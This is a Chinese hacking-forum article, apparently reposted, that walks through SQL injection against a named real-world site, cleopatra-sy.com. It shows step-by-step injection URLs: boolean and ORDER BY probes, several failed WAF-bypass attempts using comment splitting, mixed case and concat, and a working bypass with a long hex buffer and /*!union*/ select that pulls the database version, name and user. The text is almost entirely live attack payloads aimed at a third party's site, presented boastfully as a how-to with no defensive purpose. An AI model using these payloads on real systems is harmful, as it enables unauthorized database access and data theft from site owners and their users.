突破sql 注入过滤Union+SELECT 继续射下去

时间:2022-09-05 16:50:25

http://www.myhack58.com/Article/html/3/7/2011/31053.htm


 前几今天遇到一个bt 的老外注射点:  

//*ps 此点目前流行的注射工具射不 *//  
http://cleopatra-sy.com/index.php?content=more_product&id=17  
  
http://cleopatra-sy.com/index.php?content=more_product&id=17 and 1=1  正常  
http://cleopatra-sy.com/index.php?content=more_product&id=17 and 1=2  报错  

http://cleopatra-sy.com/index.php?content=more_product&id=17 order by 6  正常  
http://cleopatra-sy.com/index.php?content=more_product&id=17 order by 7  错误  
                                                                                               
继续按照常规的手法注射:  
http://cleopatra-sy.com/index.php?content=more_product&id=-17+UNION+SELECT+1,2
3,4,5,6-- 

 

 

错误nnd,过滤 UNION+SELECT  我们来加点特殊的字符看看能不能绕过  
http://cleopatra-sy.com/index.php?content=more_product&id=-17+/**//**//*!uNiOn*//**/
/**//*!sElEcT*//**//**/1,2,3,4,5,6--  
  
                                                                                                          
悲剧还是绕不过去  - -,于是尝试自己知道的绕过方法继续射…  
http://cleopatra-sy.com/index.php?content=more_product&id=-17+/*U*//*n*//*i*//*o*//*n
*//*t*/+/*s*//*e*//*l*//*e*//*c*//*t*/+1,2,3,4,5,6--  
                                                                                                 

http://cleopatra-sy.com/index.php?content=more_product&id=-17+concat(u,n,i,o,n)+conca
t(s,e,l,e,c,t)+all+1,2,3,4,5,6--  

悲剧还是绕不过去,nnd。找了几个朋友看了还是绕不过去邪恶的过滤啊。要是国内 
的站以上几种方法一般都能搞定,老外就是bt。最后实在木有办法了只好去国外的黑 
客论坛求助老外帮助。国外php 注射历史悠久手法独特+方法猥琐  射出几率相当高  
于是发帖求助了终于有一个黑客回帖了而且轻松的绕过去了。  
http://cleopatra-sy.com/index.php?content=more_product&id=-17   and   (select   1)=(select  
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAA)+/*!union*/+select+1,2,3,4,5,6--+-  

靠,老外果然牛B 那么继续射  
http://cleopatra-sy.com/index.php?content=more_product&id=-17   and   (select   1)=(select  
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),u 
ser()),3,4,5,6--+-  
成功得到系统版本、当前数据库用户、用户名